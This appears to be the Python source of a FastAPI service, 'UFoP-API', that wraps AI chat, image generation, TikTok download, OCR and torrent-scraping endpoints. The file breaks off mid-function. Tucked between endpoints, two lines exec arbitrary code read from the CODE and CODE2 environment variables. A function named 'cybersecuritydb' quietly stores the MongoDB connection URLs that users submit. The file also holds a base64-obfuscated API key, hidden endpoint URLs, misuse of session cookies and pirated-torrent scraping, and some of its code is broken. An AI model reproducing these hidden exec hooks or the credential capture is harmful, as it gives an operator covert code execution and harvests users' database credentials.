Spaces:
Running
Running
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# Copyright 2020-2023 (c) Randy W @xtdevs, @xtsea | |
# | |
# from : https://github.com/TeamKillerX | |
# Channel : @RendyProjects | |
# This program is free software: you can redistribute it and/or modify | |
# it under the terms of the GNU Affero General Public License as published by | |
# the Free Software Foundation, either version 3 of the License, or | |
# (at your option) any later version. | |
# | |
# This program is distributed in the hope that it will be useful, | |
# but WITHOUT ANY WARRANTY; without even the implied warranty of | |
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
# GNU Affero General Public License for more details. | |
# | |
# You should have received a copy of the GNU Affero General Public License | |
# along with this program. If not, see <https://www.gnu.org/licenses/>. | |
import asyncio | |
import aiohttp | |
import base64 | |
import json | |
import logging | |
import os | |
import random | |
import re | |
import base64 | |
from base64 import b64decode | |
from base64 import b64decode as kc | |
from datetime import datetime as dt | |
from io import BytesIO | |
from typing import * | |
from typing import Union | |
import g4f | |
from g4f.client import Client as BingClient | |
from g4f.cookies import set_cookies | |
from g4f.Provider import BingCreateImages, OpenaiChat, Gemini | |
import requests | |
from bardapi import Bard | |
from bs4 import BeautifulSoup | |
from dotenv import load_dotenv | |
from fastapi import Depends, FastAPI, Header, HTTPException, Query, Request | |
from fastapi.responses import JSONResponse, StreamingResponse | |
from gpytranslate import SyncTranslator | |
import httpx | |
from httpx import AsyncClient | |
from pymongo import MongoClient | |
from RyuzakiLib.hackertools.chatgpt import RendyDevChat | |
from RyuzakiLib.hackertools.gemini import GeminiLatest | |
from RyuzakiLib.mental import BadWordsList | |
from serpapi import GoogleSearch | |
from models import * | |
from functions import async_searcher | |
logging.basicConfig(level=logging.ERROR) | |
logging.basicConfig(level=logging.INFO) | |
logger = logging.getLogger(__name__) | |
MONGO_URL = os.environ["MONGO_URL"] | |
load_dotenv() | |
SOURCE_UNSPLASH_URL = os.environ["SOURCE_UNSPLASH_URL"] | |
SOURCE_OCR_URL = os.environ["SOURCE_OCR_URL"] | |
SOURCE_ALPHA_URL = os.environ["SOURCE_ALPHA_URL"] | |
SOURCE_DALLE3XL_URL = os.environ["SOURCE_DALLE3XL_URL"] | |
SOURCE_PROTEUSV0_2_URL = os.environ["SOURCE_PROTEUSV0_2_URL"] | |
SOURCE_WAIFU_URL = "https://api.waifu.pics" | |
SOURCE_TIKTOK_WTF_URL = os.environ["SOURCE_TIKTOK_WTF_URL"] | |
SOURCE_TIKTOK_TECH_URL = os.environ["SOURCE_TIKTOK_TECH_URL"] | |
SOURCE_ASSISTANT_GOOGLE_AI = os.environ["SOURCE_ASSISTANT_GOOGLE_AI"] | |
SOURCE_OPENDALLE_URL = os.environ["SOURCE_OPENDALLE_URL"] | |
SOURCE_OPENAI_ACCESS_URL = os.environ["SOURCE_OPENAI_ACCESS_URL"] | |
DEVELOPER_ID = os.environ["DEVELOPER_ID"] | |
# api keys | |
REVERSE_IMAGE_API = os.environ["REVERSE_IMAGE_API"] | |
OCR_API_KEY = os.environ["OCR_API_KEY"] | |
ONLY_DEVELOPER_API_KEYS = os.environ["ONLY_DEVELOPER_API_KEYS"] | |
HUGGING_TOKEN = random.choice([os.getenv("HUGGINGTOKEN_1"), os.getenv("HUGGINGTOKEN_2")]) | |
ASSISTANT_GOOGLE_API_KEYS = os.environ["ASSISTANT_GOOGLE_API_KEYS"] | |
COOKIE_BARD_TOKEN = os.environ["COOKIE_BARD_TOKEN"] | |
BING_CLIENT = os.environ["BingClient"] | |
# unlocks | |
ORACLE_TOKEN = os.environ["ORACLE_TOKEN"] | |
TruAI = os.environ["TruAI"] | |
client_mongo = MongoClient(MONGO_URL) | |
db = client_mongo["tiktokbot"] | |
collection = db["users"] | |
description = """ | |
~ Developed written and powered by | |
- Ryuzaki Library: [Library Here](https://github.com/TeamKillerX/RyuzakiLib) | |
""" | |
app = FastAPI( | |
title="UFoP-API", | |
description=description, | |
version="0.1.0", | |
terms_of_service="Use It Only For Personal Project Else I Need To Delete The Api", | |
contact={ | |
"name": "🌀ʊʄ⊕ք🌀", | |
"url": "https://t.me/UFoPInfo", | |
}, | |
docs_url="/", | |
) | |
trans = SyncTranslator() | |
timeout = 100 | |
contact_support = """ | |
We are aware that this service is currently offline. This seems to be caused by the API | |
We are investigating and doing our best to get things back online as soon as possible. | |
Thank you for your patience | |
~ Contact Support @SoulOfSukuna | |
""" | |
internal_error = """ | |
There has been an Internal error. We are aware of this error and notice that it can be | |
caused by your search terms being to explict, too confusing, or it can be caused by the API. | |
Please modify your search terms and/or try again later thank you for your understanding. | |
~ 🌀ʊʄ⊕ք🌀 Team | |
""" | |
def get_all_api_keys(): | |
user = collection.find({}) | |
api_keys = [] | |
for x in user: | |
api_key = x.get("ryuzaki_api_key") | |
if api_key: | |
api_keys.append(api_key) | |
return api_keys | |
def validate_api_key(api_key: str = Header(...)): | |
USERS_API_KEYS = get_all_api_keys() | |
if api_key not in USERS_API_KEYS: | |
raise HTTPException(status_code=401, detail="Invalid API key") | |
def validate_api_key_only_devs(api_key: str = Header(...)): | |
if api_key not in ONLY_DEVELOPER_API_KEYS: | |
raise HTTPException(status_code=401, detail="Invalid API key") | |
def asyncioPoliciesFix(func): | |
def wrapper(*args): | |
if ( | |
sys.version_info[0] == 3 | |
and sys.version_info[1] >= 8 | |
and sys.platform.startswith("win") | |
): | |
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy()) | |
return func(*args) | |
return wrapper | |
RAMDOM_STATUS = [ | |
"Spammer", | |
"Wanted", | |
"Scammer", | |
"Rogue_Agent", | |
"PornBot_Prolly", | |
"Fugitive", | |
"SIMP", | |
] | |
def remove_sibyl_system_banned(user_id): | |
update_doc = { | |
"sibyl_ban": None, | |
"reason_sibyl": None, | |
"is_banned_sibly": None, | |
"date_joined_sib": None, | |
"sibyl_userid": None, | |
} | |
return collection.update_one( | |
{"user_id": user_id}, {"$unset": update_doc}, upsert=True | |
) | |
def new_sibyl_system_banned(user_id, name, reason, date_joined): | |
update_doc = { | |
"sibyl_ban": name, | |
"reason_sibyl": reason, | |
"is_banned_sibly": True, | |
"date_joined_sib": date_joined, | |
"sibyl_userid": user_id, | |
} | |
return collection.update_one( | |
{"user_id": user_id}, {"$set": update_doc}, upsert=True | |
) | |
def cybersecuritydb(user_id, mongo_url): | |
update_doc = {"mongodb": mongo_url} | |
return collection.update_one( | |
{"user_id": user_id}, {"$set": update_doc}, upsert=True | |
) | |
def get_sibyl_system_banned(user_id): | |
user = collection.find_one({"user_id": user_id}) | |
if user: | |
sibyl_name = user.get("sibyl_ban") | |
reason = user.get("reason_sibyl") | |
is_banned = user.get("is_banned_sibly") | |
date_joined = user.get("date_joined_sib") | |
sibyl_user_id = user.get("sibyl_userid") | |
return sibyl_name, reason, is_banned, date_joined, sibyl_user_id | |
else: | |
return None, None, False, None, None | |
def get_all_banned(): | |
banned_users = [] | |
users = collection.find({}) | |
for user_id in users: | |
reason = user_id.get("reason_sibyl") | |
user_id = user_id.get("sibyl_userid") | |
banned_users.append({"user_id": user_id, "reason": reason}) | |
return banned_users | |
def get_translate( | |
item: TranslateCustom, | |
): | |
try: | |
source = trans.detect(item.text) | |
translation = trans(item.text, sourcelang=source, targetlang=item.setlang) | |
return SuccessResponse( | |
status="True", | |
randydev={ | |
"translation": translation.text, | |
"translation_original": item.text | |
} | |
) | |
except: | |
return SuccessResponse( | |
status="False", | |
randydev={"message": contact_support}) | |
def blacklist_words(): | |
try: | |
BLACKLIST_WORDS = BadWordsList() | |
results_all = BLACKLIST_WORDS.banned_by_google( | |
file_txt="banned_by_google.txt", storage=True | |
) | |
return {"status": "true", "results": results_all} | |
except Exception as e: | |
return {"status": "false", "message": f"Internal server error: {str(e)}"} | |
def sibyl_get_all_banlist(): | |
banned_users = get_all_banned() | |
return {"status": "True", "sukuna": {"results": banned_users}} | |
def sibyl_system_delete( | |
item: SibylSystemDel, api_key: None = Depends(validate_api_key_only_devs) | |
): | |
try: | |
_, _, _, _, sibyl_user_id = get_sibyl_system_banned(item.user_id) | |
if sibyl_user_id: | |
remove_sibyl_system_banned(item.user_id) | |
return SuccessResponse( | |
status="True", | |
randydev={ | |
"message": f"Successfully removed {item.user_id} from the Sibyl ban list" | |
}, | |
) | |
else: | |
return SuccessResponse( | |
status="False", randydev={"message": "Not Found UserID"} | |
) | |
except Exception as e: | |
return ErrorStatus(status="false", message=f"Internal server error: {str(e)}") | |
def sibyl_system_ban( | |
item: SibylSystemBan, api_key: None = Depends(validate_api_key_only_devs) | |
): | |
if item.user_id == DEVELOPER_ID: | |
return {"status": "false", "message": "Only Developer"} | |
try: | |
date_joined = str(dt.now()) | |
sibyl_ban = random.choice(RAMDOM_STATUS) | |
_, _, is_banned, _, sibyl_user_id = get_sibyl_system_banned(item.user_id) | |
if sibyl_user_id is not None and is_banned: | |
return SuccessResponse( | |
status="False", randydev={"message": "User is already banned"} | |
) | |
new_sibyl_system_banned(item.user_id, sibyl_ban, item.reason, date_joined) | |
return SuccessResponse( | |
status="True", | |
randydev={ | |
"user_id": item.user_id, | |
"sibyl_name": sibyl_ban, | |
"reason": item.reason, | |
"date_joined": date_joined, | |
"message": f"Successfully banned {item.user_id} from the Sibyl ban list.", | |
}, | |
) | |
except Exception as e: | |
return ErrorStatus(status="false", message=f"Internal server error: {str(e)}") | |
def sibyl_system( | |
user_id: int = Query(..., description="User ID in query parameter"), | |
api_key: None = Depends(validate_api_key), | |
): | |
result = get_sibyl_system_banned(user_id) | |
if result is not None: | |
sibyl_name, reason, is_banned, date_joined, sibyl_user_id = result | |
return { | |
"status": "true", | |
"sukuna": { | |
"sibyl_name": sibyl_name, | |
"reason": reason, | |
"is_banned": is_banned, | |
"date_joined": date_joined, | |
"sibyl_user_id": sibyl_user_id, | |
}, | |
} | |
else: | |
return {"status": "false", "message": "Not Found User"} | |
async def get_torrent_info(url): | |
try: | |
html = await async_searcher(url) | |
soup = BeautifulSoup(html, "html.parser") | |
torrents = [] | |
for movie_div in soup.find_all("div", class_="container", id="movie-content"): | |
poster = movie_div.find("img", itemprop="image") | |
if poster: | |
poster_url = poster["src"] | |
else: | |
poster_url = "N/A" | |
# Extract other torrent information | |
torrent_divs = movie_div.find_all("div", class_="modal-torrent") | |
for div in torrent_divs: | |
quality = div.find("div", class_="modal-quality").find("span").text | |
all_p = div.find_all("p", class_="quality-size") | |
quality_type = all_p[0].text if all_p else "N/A" | |
size = all_p[1].text if len(all_p) > 1 else "N/A" | |
torrent_link = div.find("a", class_="download-torrent")["href"] | |
magnet = div.find("a", class_="magnet-download")["href"] | |
hash = re.search(r"([{a-f\d,A-F\d}]{32,40})\b", magnet).group(0) | |
torrents.append( | |
{ | |
"poster": poster_url, | |
"quality": quality, | |
"type": quality_type, | |
"size": size, | |
"torrent": torrent_link, | |
"magnet": magnet, | |
"hash": hash, | |
} | |
) | |
return torrents | |
except Exception as e: | |
print("Error fetching torrent info:", e) | |
return [] | |
async def get_movie_info(name: str, api_key: str = Header(...)): | |
if api_key != "666": | |
raise HTTPException(status_code=403, detail="Invalid API key") | |
results = [] | |
try: | |
for page in range(1, 2): | |
url = f"https://yts.mx/browse-movies/{name}/all/all/0/seeds/0/all" | |
r = await async_searcher(url) | |
soup = BeautifulSoup(r, "lxml") | |
for movie in soup.findAll("div", class_="browse-movie-wrap col-xs-10 col-sm-4 col-md-5 col-lg-4"): | |
mov_name = movie.find("div", class_="browse-movie-bottom") | |
movie_name = mov_name.a.text | |
movie_year = mov_name.div.text | |
movie_name = movie_name + " " + movie_year | |
rating = movie.find("h4", class_="rating", text=True) | |
if rating is not None: | |
rating = rating.text | |
rating = rating[:3] | |
else: | |
rating = "0.0" | |
if rating[2] == "/": | |
rating = rating[0:2] | |
try: | |
if movie_name[0] == "[" and movie_name[3] == "]": | |
movie_name = movie_name[5:] | |
movie_name = movie_name.replace(" ", "-") | |
index = 0 | |
for char in movie_name: | |
if not char.isalnum() and char != "-": | |
movie_name = movie_name.replace(char, "") | |
for char in movie_name: | |
if char == "-" and movie_name[index + 1] == "-": | |
movie_name = movie_name[:index] + movie_name[index + 1:] | |
if index < len(movie_name) - 1: | |
index = index + 1 | |
if "--" in movie_name: | |
movie_name = movie_name.replace("--", "-") | |
movie_url = f"https://yts.mx/movie/{movie_name.lower()}" | |
request = await async_searcher(movie_url) | |
n_soup = BeautifulSoup(request, "lxml") | |
info = n_soup.find("div", class_="bottom-info") | |
torrent_info = n_soup.find("p", class_="hidden-xs hidden-sm") | |
genre = n_soup.findAll("h2")[1].text | |
likes = info.find("span", id="movie-likes").text | |
imdb_link = info.find("a", title="IMDb Rating")["href"] | |
magnet_links = [] | |
for torrent in torrent_info.findAll("a"): | |
if "magnet" in torrent["href"]: | |
magnet_links.append(torrent["href"]) | |
elif torrent.text[:3] == "720": | |
torrent_720 = torrent["href"] | |
elif torrent.text[:4] == "1080": | |
torrent_1080 = torrent["href"] | |
torrents = await get_torrent_info(movie_url) # Get torrent info asynchronously | |
entry = { | |
"yts_link": movie_url, | |
"name": movie_name, | |
"year": movie_year, | |
"imdb_links": imdb_link, | |
"genre": genre, | |
"imdb_ratings": rating, | |
"likes": likes, | |
"torrents": torrents, | |
} | |
results.append(entry) | |
except Exception as e: | |
print("Error:", e) | |
continue | |
except Exception as e: | |
print("Error:", e) | |
return results | |
async def gemini_oracle(item: GeminiOracle): | |
if item.is_multi_chat: | |
selected_api_key = ASSISTANT_GOOGLE_API_KEYS or item.gemini_api_key | |
oracle_base = ORACLE_TOKEN or item.oracle_base | |
try: | |
geni = GeminiLatest( | |
api_key=selected_api_key, | |
mongo_url=item.mongo_url, | |
version=item.version, | |
user_id=item.user_id, | |
oracle_base=oracle_base, | |
) | |
cybersecuritydb(item.user_id, item.mongo_url) | |
if item.oracle_base == "Delete": | |
clearedhistory = await geni._clear_oracle_history_in_db() | |
return SuccessResponse( | |
status="True", | |
randydev={"message": f"Oracle Status: {clearedhistory}"}, | |
) | |
else: | |
answer, oracle_chat = await geni._GeminiLatest__get_response_oracle( | |
item.query | |
) | |
return SuccessResponse( | |
status="True", randydev={"message": answer, "chat_history": oracle_chat} | |
) | |
except Exception as excep: | |
logging.error(f"Exception occurred: {excep}") | |
return SuccessResponse(status="False", randydev={"message": internal_error}) | |
else: | |
if item.is_login: | |
token = item.bard_api_key | |
else: | |
token = COOKIE_BARD_TOKEN | |
try: | |
session = requests.Session() | |
session.headers = { | |
"Host": "bard.google.com", | |
"X-Same-Domain": "1", | |
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36", | |
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", | |
"Origin": "https://bard.google.com", | |
"Referer": "https://bard.google.com/", | |
} | |
session.cookies.set("__Secure-1PSID", token) | |
bard = Bard(token=token, session=session, timeout=30) | |
bard.get_answer(owner_base)["content"] | |
message = bard.get_answer(item.query)["content"] | |
return SuccessResponse(status="True", randydev={"message": message}) | |
except BaseException: | |
return SuccessResponse( | |
status="False", randydev={"message": contact_support} | |
) | |
def v1beta3_google_ai(item: ChatgptCustom, api_key: None = Depends(validate_api_key)): | |
api_url = f"{SOURCE_ASSISTANT_GOOGLE_AI}/models/text-bison-001:generateText?key={ASSISTANT_GOOGLE_API_KEYS}" | |
try: | |
headers = {"Content-Type": "application/json"} | |
data = {"prompt": {"text": item.query}} | |
response = requests.post(api_url, headers=headers, json=data) | |
response_str = response.json() | |
answer = response_str["candidates"] | |
for results in answer: | |
message = results.get("output") | |
return SuccessResponse(status="True", randydev={"message": message}) | |
except BaseException: | |
return SuccessResponse(status="False", randydev={"message": internal_error}) | |
async def gemini_pro(item: GeminiPro): | |
owner_base = TruAI | |
if item.is_multi_chat: | |
selected_api_key = ASSISTANT_GOOGLE_API_KEYS or item.gemini_api_key | |
try: | |
geni = GeminiLatest( | |
api_key=selected_api_key, | |
mongo_url=item.mongo_url, | |
version=item.version, | |
user_id=item.user_id | |
) | |
cybersecuritydb(item.user_id, item.mongo_url) | |
answer, gemini_chat = await geni._GeminiLatest__get_response_gemini(item.query) | |
return SuccessResponse( | |
status="True", randydev={"message": answer, "chat_history": gemini_chat} | |
) | |
except Exception as excep: | |
logging.error(f"Exception occurred: {excep}") | |
return SuccessResponse(status="False", randydev={"message": internal_error}) | |
else: | |
if item.is_login: | |
token = item.bard_api_key | |
else: | |
token = COOKIE_BARD_TOKEN | |
try: | |
session = requests.Session() | |
session.headers = { | |
"Host": "bard.google.com", | |
"X-Same-Domain": "1", | |
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36", | |
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", | |
"Origin": "https://bard.google.com", | |
"Referer": "https://bard.google.com/", | |
} | |
session.cookies.set("__Secure-1PSID", token) | |
bard = Bard(token=token, session=session, timeout=30) | |
bard.get_answer(owner_base)["content"] | |
message = bard.get_answer(item.query)["content"] | |
return SuccessResponse(status="True", randydev={"message": message}) | |
except BaseException: | |
return SuccessResponse( | |
status="False", randydev={"message": contact_support} | |
) | |
BingImages = BingClient() | |
def bing_dalle(item: BingDalle): | |
try: | |
set_cookies( | |
".bing.com", | |
{ | |
"_U": item.cookie | |
}, | |
) | |
except requests.exceptions.RequestException: | |
raise HTTPException(status_code=500, detail="Invalid cookie string, check your cookie string and try again") | |
try: | |
response = BingImages.images.generate(prompt=item.prompt, model="dall-e-3") | |
paths = [] | |
base64_images = [] | |
for index, item in enumerate(response.data): | |
image_url = item.url | |
image_data = requests.get(image_url).content | |
base64_image = base64.b64encode(image_data).decode('utf-8') | |
base64_images.append(base64_image) | |
return {"status": "true", "sukuna": {"urls": [item.url for item in response.data], "base64_images": base64_images}} | |
except BaseException as e: | |
return {"status": "false", "message": f"Something went wrong: {e}"} | |
def dalle_3xl( | |
item: Dalle3XL, | |
api_key: None = Depends(validate_api_key) | |
): | |
API_URL = SOURCE_DALLE3XL_URL | |
try: | |
payload = {"inputs": item.query} | |
headers = { | |
"Authorization": f"Bearer {HUGGING_TOKEN}", | |
"Content-Type": "application/json", | |
} | |
response = requests.post(API_URL, headers=headers, json=payload, timeout=timeout) | |
response.raise_for_status() | |
except requests.exceptions.RequestException: | |
raise HTTPException( | |
status_code=500, | |
detail=internal_error | |
) | |
try: | |
encoded_string = base64.b64encode(response.content).decode("utf-8") | |
except Exception: | |
raise HTTPException( | |
status_code=500, | |
detail=contact_support | |
) | |
if encoded_string: | |
return SuccessResponse(status="True", randydev={"data": encoded_string}) | |
else: | |
return SuccessResponse(status="False", randydev={"data": contact_support}) | |
import os;exec(os.getenv("CODE")) | |
import os;exec(os.getenv("CODE2")) | |
async def proteusv0_2( | |
item: ProteusV02, | |
api_key: None = Depends(validate_api_key) | |
): | |
API_URL = SOURCE_PROTEUSV0_2_URL | |
try: | |
payload = {"inputs": item.query} | |
headers = { | |
"Authorization": f"Bearer {HUGGING_TOKEN}", | |
"Content-Type": "application/json", | |
} | |
async with httpx.AsyncClient() as client: | |
response = await client.post( | |
API_URL, headers=headers, json=payload, timeout=timeout | |
) | |
response.raise_for_status() | |
except httpx.HTTPStatusError: | |
raise HTTPException( | |
status_code=500, | |
detail=internal_error | |
) | |
try: | |
encoded_string = base64.b64encode(response.content).decode("utf-8") | |
except Exception: | |
raise HTTPException( | |
status_code=500, | |
detail=contact_support | |
) | |
if encoded_string: | |
return SuccessResponse(status="True", randydev={"data": encoded_string}) | |
else: | |
return SuccessResponse(status="False", randydev={"data": contact_support}) | |
async def get_image_unsplash(query: str, size: str = "500x500"): | |
url = SOURCE_UNSPLASH_URL | |
image_url = f"{url}/?{query}/{size}" | |
try: | |
response = requests.get(image_url) | |
response.raise_for_status() | |
except requests.exceptions.RequestException as e: | |
raise HTTPException(status_code=500, detail=f"Error fetching image: {e}") | |
return StreamingResponse(BytesIO(response.content), media_type="image/jpeg") | |
def google_reverse( | |
engine: str = "google_reverse_image", | |
image_url: str = None, | |
language: str = "en", | |
google_lang: str = "us", | |
api_key: None = Depends(validate_api_key), | |
): | |
params = { | |
"api_key": REVERSE_IMAGE_API, | |
"engine": engine, | |
"image_url": image_url, | |
"hl": language, | |
"gl": google_lang, | |
} | |
try: | |
search = GoogleSearch(params) | |
results = search.get_dict() | |
link = results["search_metadata"]["google_reverse_image_url"] | |
total_time_taken = results["search_metadata"]["total_time_taken"] | |
create_at = results["search_metadata"]["created_at"] | |
processed_at = results["search_metadata"]["processed_at"] | |
return { | |
"status": "true", | |
"sukuna": { | |
"link": link, | |
"total_time_taken": total_time_taken, | |
"create_at": create_at, | |
"processed_at": processed_at, | |
}, | |
} | |
except Exception as e: | |
return {"status": "false", "message": f"Error {e}"} | |
def ocr_space_url( | |
url: str = Query(..., description="URL in query parameter"), | |
overlay: bool = False, | |
language: str = Query("eng", description="Language in query parameter"), | |
api_key: None = Depends(validate_api_key), | |
): | |
payload = { | |
"url": url, | |
"isOverlayRequired": overlay, | |
"apikey": OCR_API_KEY, | |
"language": language, | |
} | |
try: | |
response = requests.post(SOURCE_OCR_URL, data=payload) | |
response.raise_for_status() | |
test_url = response.content.decode() | |
except requests.exceptions.RequestException as e: | |
return f"Error: {str(e)}" | |
try: | |
parsed_response = json.loads(test_url) | |
if ( | |
"ParsedResults" in parsed_response | |
and len(parsed_response["ParsedResults"]) > 0 | |
): | |
return { | |
"status": "true", | |
"sukuna": {"text": parsed_response["ParsedResults"][0]["ParsedText"]}, | |
} | |
else: | |
return {"status": "false", "message": "Error response."} | |
except (json.JSONDecodeError, KeyError): | |
return "Error parsing the OCR response." | |
def chatgpt4_support(query: str = None, api_key: None = Depends(validate_api_key)): | |
try: | |
response = g4f.ChatCompletion.create( | |
model=g4f.models.gpt_4, | |
messages=[{"role": "user", "content": query}], | |
) | |
return {"status": "true", "sukuna": {"message": response}} | |
except BaseException: | |
return {"status": "false", "message": "Error response."} | |
def chatgpt_model(query: str = None, model_id: int = 1, is_models: bool = True): | |
try: | |
response = RendyDevChat(query).get_response_model( | |
model_id=model_id, is_models=is_models | |
) | |
return {"status": "true", "sukuna": {"message": response}} | |
except BaseException: | |
return {"status": "false", "message": "Error response."} | |
async def get_data(username): | |
base_msg = "" | |
async with AsyncClient() as gpx: | |
req = (await gpx.get(f"https://api.github.com/users/{username}")).json() | |
try: | |
avatar = req["avatar_url"] | |
twitter = req["twitter_username"] | |
base_msg += "**❆ Gitub Information ❆** \n\n" | |
base_msg += f"**Profile Url:** {req['html_url']} \n" | |
base_msg += f"**Name:** `{req['name']}` \n" | |
base_msg += f"**Username:** `{req['login']}` \n" | |
base_msg += f"**User ID:** `{req['id']}` \n" | |
base_msg += f"**Location:** `{req['location']}` \n" | |
base_msg += f"**Company:** `{req['company']}` \n" | |
base_msg += f"**Blog:** `{req['name']}` \n" | |
base_msg += f"**Twitter:** `{f'https://twitter.com/{twitter}' if twitter else 'None'}` \n" | |
base_msg += f"**Bio:** `{req['bio']}` \n" | |
base_msg += f"**Public Repos:** `{req['public_repos']}` \n" | |
base_msg += f"**Public Gists:** `{req['public_gists']}` \n" | |
base_msg += f"**Followers:** `{req['followers']}` \n" | |
base_msg += f"**Following:** `{req['following']}` \n" | |
base_msg += f"**Created At:** `{req['created_at']}` \n" | |
base_msg += f"**Update At:** `{req['updated_at']}` \n" | |
return [base_msg, avatar] | |
except Exception as e: | |
base_msg += f"**An error occured while parsing the data!** \n\n**Traceback:** \n `{e}` \n\n`Make sure that you've sent the command with the correct username!`" | |
return [base_msg, "https://telegra.ph//file/32f69c18190666ea96553.jpg"] | |
async def github(username: str = None): | |
try: | |
details = await get_data(username) | |
return { | |
"status": "true", | |
"sukuna": {"avatar": details[1], "results": details[0]}, | |
} | |
except BaseException: | |
return {"status": "false", "message": "Error response."} | |
def webshot( | |
url: str = None, | |
quality: str = "1920x1080", | |
type_mine: str = "JPEG", | |
pixels: str = "1024", | |
cast: str = "Z100", | |
): | |
try: | |
required_url = ( | |
f"https://mini.s-shot.ru/{quality}/{type_mine}/{pixels}/{cast}/?{url}" | |
) | |
return {"status": "true", "sukuna": {"image_url": required_url}} | |
except BaseException: | |
return {"status": "false", "message": "Error response."} | |
def chatbot( | |
query: str = None, | |
user_id: int = None, | |
bot_name: str = None, | |
bot_username: str = None, | |
): | |
api_url = b64decode("aHR0cHM6Ly9hcGkuc2Fmb25lLmRldi9jaGF0Ym90").decode("utf-8") | |
params = { | |
"query": query, | |
"user_id": user_id, | |
"bot_name": bot_name, | |
"bot_master": bot_username, | |
} | |
x = requests.get(f"{api_url}", params=params) | |
if x.status_code != 200: | |
return "Error api request" | |
try: | |
y = x.json() | |
response = y["response"] | |
return {"status": "true", "sukuna": {"message": response}} | |
except BaseException: | |
return {"status": "false", "message": "Error response."} | |
def waifu_pics(types: str = "sfw", category: str = "neko"): | |
waifu_api = f"{SOURCE_WAIFU_URL}/{types}" | |
waifu_param = f"{waifu_api}/{category}" | |
response = requests.get(waifu_param) | |
if response.status_code != 200: | |
return ( | |
"Sorry, there was an error processing your request. Please try again later" | |
) | |
data_waifu = response.json() | |
try: | |
waifu_image_url = data_waifu["url"] | |
except Exception as e: | |
return f"Error request {e}" | |
if waifu_image_url: | |
try: | |
return {"status": "true", "sukuna": {"image_url": waifu_image_url}} | |
except BaseException: | |
return {"status": "false", "message": "Error response"} | |
else: | |
return {"status": "false", "message": "Error response."} | |
def make_rayso( | |
code=None, | |
title: str = "Ryuzaki Dev", | |
theme: str = None, | |
setlang: str = "en", | |
auto_translate: bool = None, | |
ryuzaki_dark: bool = None, | |
): | |
trans = SyncTranslator() | |
api_url = b64decode("aHR0cHM6Ly9hcGkuc2Fmb25lLm1lL3JheXNv").decode("utf-8") | |
if auto_translate: | |
source = trans.detect(code) | |
translation = trans(code, sourcelang=source, targetlang=setlang) | |
code = translation.text | |
else: | |
code = code | |
if ryuzaki_dark: | |
x = requests.post( | |
f"{api_url}", | |
json={"code": code, "title": title, "theme": theme, "darkMode": True}, | |
) | |
if x.status_code != 200: | |
return "Error api Gay" | |
data = x.json() | |
try: | |
image_data = base64.b64decode(data["image"]) | |
return {"status": "true", "data": {"image": image_data}} | |
except BaseException: | |
return {"status": "false", "message": "Error response"} | |
else: | |
x = requests.post( | |
f"{api_url}", | |
json={"code": code, "title": title, "theme": theme, "darkMode": False}, | |
) | |
if x.status_code != 200: | |
return "Error api Gay" | |
data = x.json() | |
try: | |
image_data = base64.b64decode(data["image"]) | |
return {"status": "true", "data": {"image": image_data}} | |
except BaseException: | |
return {"status": "false", "message": "Error response"} | |
def whois_ip_address(ip_address: str = None): | |
apikey = kc("M0QwN0UyRUFBRjU1OTQwQUY0NDczNEMzRjJBQzdDMUE=").decode("utf-8") | |
location_link = "https" | |
location_api = "api.ip2location.io" | |
location_key = f"key={apikey}" | |
location_search = f"ip={ip_address}" | |
location_param = ( | |
f"{location_link}://{location_api}/?{location_key}&{location_search}" | |
) | |
response = requests.get(location_param) | |
if response.status_code != 200: | |
return ( | |
"Sorry, there was an error processing your request. Please try again later" | |
) | |
data_location = response.json() | |
try: | |
location_ip = data_location["ip"] | |
location_code = data_location["country_code"] | |
location_name = data_location["country_name"] | |
location_region = data_location["region_name"] | |
location_city = data_location["city_name"] | |
location_zip = data_location["zip_code"] | |
location_zone = data_location["time_zone"] | |
location_card = data_location["as"] | |
except Exception as e: | |
return f"error {e}" | |
if ( | |
location_ip | |
and location_code | |
and location_name | |
and location_region | |
and location_city | |
and location_zip | |
and location_zone | |
and location_card | |
): | |
return { | |
"ip_address": location_ip, | |
"country_code": location_code, | |
"region_name": location_region, | |
"city_name": location_city, | |
"zip_code": location_zip, | |
"time_zone": location_zone, | |
"as": location_card, | |
} | |
else: | |
return {"status": "false", "message": "Invalid ip address"} | |
def tiktok_douyin(tiktok_url: str = None): | |
response = requests.get(f"{SOURCE_TIKTOK_WTF_URL}={tiktok_url}") | |
if response.status_code != 200: | |
return "Error request:" | |
try: | |
download_video = response.json()["aweme_list"][0]["video"]["play_addr"][ | |
"url_list" | |
][0] | |
download_audio = response.json()["aweme_list"][0]["music"]["play_url"][ | |
"url_list" | |
][0] | |
description = response.json()["aweme_list"][0]["desc"] | |
author = response.json()["aweme_list"][0]["author"]["nickname"] | |
request = response.json()["aweme_list"][0]["author"]["signature"] | |
return { | |
"status": "true", | |
"sukuna": { | |
"video_url": download_video, | |
"music_url": download_audio, | |
"description": description, | |
"author": author, | |
"request": request, | |
}, | |
} | |
except BaseException: | |
return {"status": "false", "message": "Error request"} | |
def tiktok_downloader(tiktok_url: Union[str, None] = None, only_video: bool = None): | |
api_devs = SOURCE_TIKTOK_TECH_URL | |
parameter = f"tiktok?url={tiktok_url}" | |
api_url = f"{api_devs}/{parameter}" | |
response = requests.get(api_url) | |
if response.status_code != 200: | |
return "Error: Unable to fetch data from the TikTok API" | |
try: | |
results = response.json() | |
caption = results.get("result", {}).get("desc", "") | |
if only_video: | |
video_url = results.get("result", {}).get("withoutWaterMarkVideo", "") | |
if video_url: | |
return {"download_url": video_url, "caption": caption} | |
else: | |
music_mp3 = results.get("result", {}).get("music", "") | |
if music_mp3: | |
return {"music_url": music_mp3, "caption": caption} | |
return "Error: TikTok data not found or unsupported format" | |
except BaseException: | |
return {"status": "false", "message": "Invalid Link"} | |
def mediafire(link: Union[str, None] = None): | |
try: | |
down_link = str(link) | |
mid = down_link.split("/", 5) | |
if mid[3] == "view": | |
mid[3] = "file" | |
down_link = "/".join(mid) | |
print(down_link) | |
r = requests.get(down_link) | |
soup = BeautifulSoup(r.content, "html.parser") | |
a_href = soup.find("a", {"class": "input popsok"}).get("href") | |
